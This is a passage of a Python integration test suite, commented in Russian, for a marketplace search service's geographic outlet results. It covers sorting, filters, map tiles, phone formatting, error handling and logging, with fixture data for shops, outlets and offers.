\"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"223\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_dprice_booknow(self):\n # Что тестируем: сортировку по убыванию цены для BookNow-выдачи\n response = self.report.request_json(\n 'place=geo&how=dprice&show-book-now-only=1&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_price_filter(self):\n # Что тестируем: фильтрацию по цене\n response = self.report.request_json('place=geo&mcpricefrom=95&mcpriceto=105&hyperid=301&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлета, в котором нет подходящего оффера, нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 12, \"shops\": 3, \"shopOutlets\": 12}}, preserve_order=True)\n\n def test_warranty_filter(self):\n # Что тестируем: фильтрацию по наличию гарантиии\n response = self.report.request_json('place=geo&manufacturer_warranty=1&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - на выдаче нужный оффер\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"good52\"}}, preserve_order=True)\n\n def test_qrfrom_filter(self):\n # Что тестируем: фильтрацию по рейтингу магазина\n response = self.report.request_json('place=geo&qrfrom=4&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлета, в котором нет подходящего оффера, нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n\n def test_offer_shipping_filter(self):\n # Что тестируем: фильтрацию по типу доставки\n\n # Запрос &offer-shipping=store\n response = self.report.request_json('place=geo&offer-shipping=store&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлетов типа pickup, нет в выдаче\n self.assertFragmentNotIn(response, {\"type\": \"pickup\"}, preserve_order=True)\n\n # Запрос &offer-shipping=pickup\n response = self.report.request_json('place=geo&offer-shipping=pickup&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлетов типа store, нет в выдаче\n self.assertFragmentNotIn(response, {\"type\": \"store\"}, preserve_order=True)\n\n # Что тестируем: отображение в выдаче только постомат-аутлетов\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&offer-shipping=postomat'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"outletId\": 261, \"count\": 1},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n ],\n preserve_order=True,\n )\n\n # Что тестируем: отображение в выдаче только и постомат и store аутлетов (постомат-аутлеты выводятся при фильтре по pickup)\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&offer-shipping=pickup,store'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n\n # Что тесируем: В тайлы попадают только постаматы\n response = self.report.request_json(\n 'place=geo&tile=617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&show-outlet=tiles&rids=0&offer-shipping=postomat'\n )\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\"coord\": {\"x\": 617, \"y\": 322}, \"outlets\": []},\n {\"coord\": {\"x\": 617, \"y\": 323}, \"outlets\": []},\n {\"coord\": {\"x\": 617, \"y\": 324}, \"outlets\": [{\"id\": \"261\"}]},\n ]\n },\n preserve_order=True,\n )\n\n # Что тестируем: В выдаче нет других аутлетов, только постоматы. (в т.ч. pickup - аутлеты отфильтровываются от postomat)\n response = self.report.request_json('place=geo&rids=0&offer-shipping=postomat&text=good')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"outletId\": 261, \"count\": 1},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"outletId\": 262, \"count\": 1},\n \"outlet\": {\n \"id\": \"262\",\n },\n },\n ],\n },\n preserve_order=True,\n )\n\n def test_home_region_filter(self):\n # Что тестируем: фильтрацию по стране магазина\n response = self.report.request_json('place=geo&home_region_filter=10&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлета магазина другой страны нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 4, \"shops\": 1, \"shopOutlets\": 4}}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"shop\": {\"id\": 104}}, preserve_order=True)\n\n # Проверяем формат\n self.assertFragmentNotIn(\n response,\n {\n \"filters\": [\n {\n \"id\": \"home_region\",\n }\n ]\n },\n )\n\n def test_fesh_filter(self):\n # Что тестируем: фильтрацию по магазину\n response = self.report.request_json('place=geo&fesh=104&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлетов других магазинов нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(response, {\"shop\": {\"id\": 104}}, preserve_order=True)\n\n def test_group_model_expansion(self):\n # Что тестируем: для групповой модели возвращаются модификации\n response = self.report.request_json('place=geo&hyperid=310&point_id=241&grhow=offer')\n self.assertEqual(3, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 310}}, preserve_order=True)\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 311}}, preserve_order=True)\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 312}}, preserve_order=True)\n\n def test_group_model_expansion_multiple_hyperid(self):\n # Что тестируем: для групповой модели не возвращаются модификации если в запросе несколько hyperid\n response = self.report.request_json('place=geo&hyperid=310&hyperid=311&point_id=241&grhow=offer')\n self.assertEqual(2, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 310}}, preserve_order=True)\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 311}}, preserve_order=True)\n\n def test_group_model_expansion_not_a_group_model(self):\n # Что тестируем: hyperid не групповой модели - возвращается только она\n response = self.report.request_json('place=geo&hyperid=311&point_id=241')\n self.assertEqual(1, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 311}}, preserve_order=True)\n\n def test_group_by(self):\n # Что тестируем: наличие groupBy на выдаче\n response = self.report.request_json('place=geo&hyperid=301&grhow=offer')\n self.assertFragmentIn(response, {\"search\": {\"groupBy\": \"outlet\"}})\n\n response = self.report.request_json('place=geo&hyperid=301&point_id=211&grhow=offer')\n self.assertFragmentIn(response, {\"search\": {\"groupBy\": \"offer\"}})\n\n def test_default_sorting_for_guru(self):\n # Что тестируем: сортировка по умолчанию в гуру-категории - SF_CPM\n response = self.report.request_json('place=geo&hid=504&rids=0&debug=1')\n self.assertFragmentIn(response, {\"how\": [{\"args\": Wildcard(\"*\\nsorting_by: 1\\n*\")}]})\n\n def test_empty_results_booknow(self):\n # Что тестируем: выдачу с учетом баундинга пустом квадрате в BookNow-выдаче\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&geo-location=37.15,55.65&geo_bounds_lb=37.0,55.6&geo_bounds_rt=37.2,55.8&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 0, \"shops\": 0, \"shopOutlets\": 0}})\n self.assertFragmentNotIn(response, {\"entity\": \"offer\"})\n\n def test_booknow_with_post_terminals(self):\n # Что тестируем booknow и постаматы отображаются вместе на гео\n response = self.report.request_json('place=geo&hyperid=701&rids=0&show-urls=geo,geoOutlet,geoPointInfo')\n\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 1, \"shopOutlets\": 3}})\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"outlet\": {\n \"id\": \"263\",\n }\n },\n {\n \"outlet\": {\n \"id\": \"261\",\n }\n },\n {\n \"outlet\": {\n \"id\": \"262\",\n }\n },\n ]\n },\n preserve_order=True,\n )\n\n # Что тестируем при show-book-now-only=1 отображаем только один аутлет\n response = self.report.request_json(\n 'place=geo&hyperid=701&rids=0&show-urls=geo,geoOutlet,geoPointInfo&show-book-now-only=1'\n )\n\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}})\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"outlet\": {\n \"id\": \"263\",\n }\n }\n ]\n },\n preserve_order=True,\n )\n\n def test_empty_request_error(self):\n # Что тестируем: выдачу ошибки EMPTY REQUEST в JSON-формате\n response = self.report.request_json('place=geo&rids=0')\n self.assertFragmentIn(response, {\"error\": {\"code\": \"EMPTY_REQUEST\", \"message\": \"Request is empty\"}})\n\n def test_outlet_phones(self):\n # Что тестируем: выдачу telephone в outlet\n response = self.report.request_json('place=geo&fesh=105&rids=0')\n self.assertFragmentIn(\n response,\n {\n \"outlet\": {\n \"name\": \"OUTLET-105-251\",\n \"telephones\": [\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \"123-45-67\",\n \"extensionNumber\": \"89\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \"987-65-43\",\n \"extensionNumber\": \"21\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"812\",\n \"telephoneNumber\": \" 765-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \"765-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"812\",\n \"telephoneNumber\": \"305 26 71\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"123\",\n \"telephoneNumber\": \"4561234\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"8\",\n \"cityCode\": \"7655\",\n \"telephoneNumber\": \" 4-72110\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \" 355-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"\",\n \"telephoneNumber\": \"355-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"\",\n \"telephoneNumber\": \"1-23-456\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"\",\n \"telephoneNumber\": \"987654\",\n \"extensionNumber\": \"\",\n },\n ],\n }\n },\n preserve_order=True,\n )\n\n def test_show_cpa_disabled(self):\n response = self.report.request_json('place=geo&text=good52')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\n \"raw\": \"good52\",\n },\n \"description\": \"\",\n \"cpa\": NoKey(\"cpa\"),\n },\n )\n\n def test_geo_flag(self):\n # Что тестируем: неявный флаг &geo=1 в place=geo\n response = self.report.request_json('place=geo&hid=501&rids=1&debug=1')\n self.assertFragmentIn(response, {\"how\": [{\"args\": Wildcard(\"*\\ngeo: true\\n*\")}]})\n\n def test_bad_rs(self):\n # non base64 rs\n response = self.report.request_json('place=geo' '&text=good52' '&owner=offercard' '&rs=B@D_RS')\n self.assertFragmentIn(response, {\"entity\": \"offer\"})\n\n # bad zlib inside of base64 (incorrect header check)\n response = self.report.request_json(\n 'place=geo' '&text=good52' '&owner=offercard' '&rs=ejzjybcsmty0mjftmdaxtzy2mdawbllmdcqylrgnaum-bii%2c'\n )\n self.assertFragmentIn(response, {\"entity\": \"offer\"})\n self.error_log.expect(code=3630, message=Contains('can not decode report state from')).times(4)\n\n def test_urls_for_offercard_without_cpa(self):\n # place=geo&text=good52&owner=offercard&show-urls=geoOutlet,phone,showPhone,cpa&pp=18\n _ = self.report.request_json(\n 'place=geo' '&text=good53' '&owner=offercard' '&show-urls=encrypted,cpa,phone,showPhone' '&pp=18'\n )\n # 4 offers will be found\n self.show_log.expect(pp=18, pp_oi=2, url_type=UrlType.EXTERNAL).times(4)\n self.show_log.expect(pp=18, pp_oi=5, url_type=UrlType.CPA).times(0)\n self.show_log.expect(pp=18, pp_oi=3, url_type=UrlType.SHOW_PHONE).times(4)\n self.show_log.expect(pp=18, pp_oi=3, url_type=UrlType.PHONE).times(4)\n self.click_log.expect(clicktype=ClickType.EXTERNAL, url_type=UrlType.EXTERNAL, pp=18, pp_oi=2).times(4)\n self.click_log.expect(clicktype=ClickType.CPA, url_type=UrlType.CPA, pp=18, pp_oi=5).times(0)\n self.click_log.expect(clicktype=ClickType.PHONE, url_type=UrlType.PHONE, pp=18, pp_oi=3).times(4)\n self.click_log.expect(clicktype=ClickType.SHOW_PHONE, url_type=UrlType.SHOW_PHONE, pp=18, pp_oi=3).times(4)\n\n def test_invalid_glfilter_log_message(self):\n # Что тестируем: в логе должно быть только одно сообщение про невалидный GL фильтр\n self.report.request_json('place=geo&hid=501&rids=0&show-urls=geo,geoOutlet,geoPointInfo&glfilter=123:456')\n self.error_log.expect('Error in glfilters syntax:').once()\n\n def test_model_filtering(self):\n # Что тестируем: фильтрацию моделей на базовых поисках\n response = self.report.request_json('place=geo&hid=601&point_id=251&debug=1')\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"total\": 1,\n \"results\": [\n {\n \"entity\": \"offer\",\n \"outlet\": {\n \"id\": \"251\",\n },\n }\n ],\n }\n },\n )\n\n def test_missing_pp(self):\n response = self.report.request_json(\n 'place=geo&hid=501&rids=0&show-urls=geo,geoOutlet,geoPointInfo&ip=127.0.0.1',\n strict=False,\n add_defaults=DefaultFlags.BS_FORMAT,\n )\n self.error_log.expect('Some client has not set PP value. Find and punish him violently').once()\n self.assertEqual(500, response.code)\n\n def test_grhow_one_shop_and_only_one_offer_is_shown(self):\n # What we check: that parameter grhow=shop leads to grouping by shop with only one offer per shop\n response = self.report.request_json('place=geo&point_id=410&text=pepyaka-postomatish&grhow=shop')\n self.assertEqual(1, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"shop\": {\"id\": 110}})\n\n def test_nosearchresults(self):\n # Что тестируем: отсуствие результатов на выдаче и записей в show log при nosearchresults=1\n response = self.report.request_json(\n 'place=geo&nosearchresults=1&show-outlet=offers,tiles&show-urls=geo,geoOutlet,geoPointInfo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&tile617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&rids=0' # noqa\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 9, \"shops\": 3, \"shopOutlets\": 9}})\n self.assertFragmentNotIn(response, {\"results\": []})\n self.assertFragmentNotIn(response, {\"tiles\": []})\n self.show_log.expect(url=Wildcard('*')).never()\n\n def test_geo_old_for_checkouter(self):\n \"\"\"Отображение в т.ч. инпост-аутлетов в xml-формате для чекаутера\n Проверяем что delivery-for-checkout=1 игнорируется ( MARKETOUT-12509 )\"\"\"\n expected = {\n \"search\": {\n \"total\": 3,\n \"salesDetected\": False,\n \"shopOutlets\": 3,\n \"shops\": 3,\n \"results\": [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"261\"}},\n ],\n }\n }\n response = self.report.request_json(\n 'place=geo&geo=1&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&delivery-for-checkout=1&grhow=shop'\n )\n self.assertFragmentIn(response, expected)\n\n response = self.report.request_json(\n 'place=geo&geo=1&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&grhow=shop'\n )\n self.assertFragmentIn(response, expected)\n\n def test_sort_by_distance_post_terminals(self):\n \"\"\"Отображение постаматов при сортировке по distance. Не зависит от &touch\"\"\"\n for add_param in ['', '&touch=1']:\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.12,55.03&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=1®set=1'\n + add_param\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good12\"},\n \"bundleCount\": 4,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 4},\n \"outlet\": {\n \"id\": \"211\",\n \"bundleCount\": 6,\n \"bundled\": {\"modelId\": 301, \"count\": 6},\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 3},\n \"outlet\": {\"id\": \"231\", \"bundleCount\": 3, \"bundled\": {\"modelId\": 301, \"count\": 3}},\n },\n ],\n preserve_order=True,\n )\n\n def test_product_type(self):\n _ = self.report.request_json('place=geo&show-outlet=offers&hyperid=301&rids=0')\n self.access_log.expect(product_type='MODEL')\n\n _ = self.report.request_json('place=geo&show-outlet=offers&hyperid=1000000007&rids=0')\n self.access_log.expect(product_type='VCLUSTER')\n\n _ = self.report.request_json(\n 'place=geo&nosearchresults=1&show-outlet=offers,tiles&show-urls=geo,geoOutlet,geoPointInfo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&tile617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&rids=0' # noqa\n )\n self.access_log.expect(product_type='NONE')\n\n @classmethod\n def prepare_model_search_shops(cls):\n cls.index.shops += [\n Shop(fesh=1101, priority_region=1),\n Shop(fesh=1102, priority_region=1),\n Shop(fesh=1103, priority_region=1),\n Shop(fesh=1104, priority_region=1),\n Shop(fesh=1105, priority_region=1),\n ]\n\n # Аутлеты на \"карте\"\n # Числа в скобках - координаты тайлов при zoom = 10\n # 37.0(617) 37.2(617) 37.4(618) 37.6(618) 37.8(619)\n # 55.8(321) |--------------|---------------|--------------|---------------\n # | | | |\n # | | | |\n # | | | |\n # | | | |\n # 55.6(322) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(1221) | *(1222) | |\n # | | |*Home |\n # | | |*(1241) |\n # 55.4(323) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(1232) | *(1233) | | *(1251)\n # | *(1212) | *(1213) | |\n # | | | |\n # 55.2(324) |--------------|---------------|--------------|---------------\n # | *We | | |\n # | *(1231) | *Work | |\n # | | *(1214) | |\n # | *(1211) | | |\n # 55.0(325) |--------------|---------------|--------------|---------------\n\n cls.index.outlets += [\n Outlet(\n point_id=1211,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.1, 55.1),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=100),\n ),\n Outlet(\n point_id=1212,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.1, 55.3),\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=1213,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.3, 55.3),\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(price=300),\n ),\n Outlet(\n point_id=1214,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.3, 55.1),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=400),\n ),\n Outlet(point_id=1221, fesh=1102, region=1, gps_coord=GpsCoord(37.1, 55.5), point_type=Outlet.FOR_STORE),\n Outlet(point_id=1222, fesh=1102, region=1, gps_coord=GpsCoord(37.3, 55.5), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=1231, fesh=1103, region=1, gps_coord=GpsCoord(37.12, 55.12), point_type=Outlet.FOR_STORE),\n Outlet(point_id=1232, fesh=1103, region=1, gps_coord=GpsCoord(37.12, 55.32), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=1233, fesh=1103, region=1, gps_coord=GpsCoord(37.32, 55.32)),\n Outlet(point_id=1241, fesh=1104, region=1, gps_coord=GpsCoord(37.42, 55.42)),\n # Аутлеты вне зоны видимости\n Outlet(point_id=1251, fesh=1105, region=1, gps_coord=GpsCoord(37.7, 55.3)),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=7001,\n fesh=1101,\n carriers=[99],\n options=[\n PickupOption(outlet_id=1211, price=100),\n PickupOption(outlet_id=1212, price=200),\n PickupOption(outlet_id=1213, price=300),\n PickupOption(outlet_id=1214, price=400),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7002,\n fesh=1102,\n carriers=[99],\n options=[PickupOption(outlet_id=1221, price=0), PickupOption(outlet_id=1222, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7003,\n fesh=1103,\n carriers=[99],\n options=[\n PickupOption(outlet_id=1231, price=0),\n PickupOption(outlet_id=1232, price=0),\n PickupOption(outlet_id=1233, price=0),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7004,\n fesh=1104,\n carriers=[99],\n options=[PickupOption(outlet_id=1241, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7005,\n fesh=1105,\n carriers=[99],\n options=[PickupOption(outlet_id=1251, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n @classmethod\n def prepare_attraction_points(cls):\n '''\n Подготавливаем данные для тестирования точек притяжения (адрес жительства и места работы)\n Есть три точки:\n * Дом\n * Работа\n * Работа, находящаяся далеко за пределами экрана\n Есть 4 пользователя:\n * Без адресов (10) - результат должен совпадать с тем, как-будто пользователя нет\n * С одним адресом (11) - первыми отображаются точки близкие к этому адресу, потом к текущим координатам, потом все остальные\n * С двумя адресами (12) - первыми отображаются точки близкие к домашнему адресу, потом к работе, потом к текущим и все остальные\n * С далеким местом работы (13) - не должно быть точек притяжения\n '''\n home_address = DataSyncYandexUserAddress(address_id='home', gps_coord=HOME_GPS_COORD)\n work_address = DataSyncYandexUserAddress(address_id='work', gps_coord=WORK_GPS_COORD)\n far_address = DataSyncYandexUserAddress(address_id='work', gps_coord=FAR_GPS_COORD)\n cls.datasync.on_request_yandex_user_address(10).respond([])\n cls.datasync.on_request_yandex_user_address(11).respond([home_address])\n cls.datasync.on_request_yandex_user_address(12).respond([work_address, home_address])\n cls.datasync.on_request_yandex_user_address(13).respond([far_address])\n\n @classmethod\n def prepare_search(cls):\n cls.index.cpa_categories += [\n CpaCategory(hid=3001, regions=[1, 213], cpa_type=CpaCategoryType.CPA_NON_GURU),\n CpaCategory(hid=3002, regions=[1, 213], cpa_type=CpaCategoryType.CPC_AND_CPA),\n ]\n # CPA category. Offers are sorted as they should appear on search.\n cls.index.offers += [\n Offer(hid=3001, title='kayak 1_from_3001', fesh=1101, ts=30011, pickup_buckets=[7001]),\n Offer(hid=3001, title='kayak 2_from_3001', fesh=1105, ts=30012, pickup_buckets=[7005]), # Out of sight\n Offer(hid=3001, title='kayak 3_from_3001', fesh=1102, ts=30013, pickup_buckets=[7002]),\n Offer(hid=3001, title='4_from_3001', bid=200, fesh=1103, ts=30014, pickup_buckets=[7003]),\n Offer(hid=3001, title='5_from_3001', bid=1000, fesh=1104, ts=30015, pickup_buckets=[7004]),\n ]\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30011).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30012).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30013).respond(0.52)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30014).respond(0.48)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30015).respond(0.5)\n # CPC category. Offers are sorted as they should appear on search.\n cls.index.offers += [\n Offer(hid=3002, title='1_from_3002', bid=50, fesh=1101, ts=30021, pickup_buckets=[7001]),\n Offer(hid=3002, title='2_from_3002', bid=40, fesh=1105, ts=30022, pickup_buckets=[7005]), # Out of sight\n Offer(hid=3002, title='3_from_3002', bid=20, fesh=1102, ts=30023, pickup_buckets=[7002]),\n Offer(hid=3002, title='kayak 4_from_3002', bid=30, fesh=1103, ts=30024, pickup_buckets=[7003]),\n Offer(hid=3002, title='kayak 5_from_3002', bid=10, fesh=1104, ts=30025, pickup_buckets=[7004]),\n ]\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30021).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30022).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30023).respond(0.52)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30024).respond(0.48)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30025).respond(0.5)\n\n def test_geo_text_search_in_param_how(self):\n '''Что тестируем: сортировку как на поиске'''\n response = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 10, \"shops\": 4, \"shopOutlets\": 10}})\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 5_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_geo_text_search_autobroker_head_in_param_how(self):\n '''Что тестируем: автоброкер как на поиске, для первого цикла по офферам'''\n _ = self.report.request_json(\n 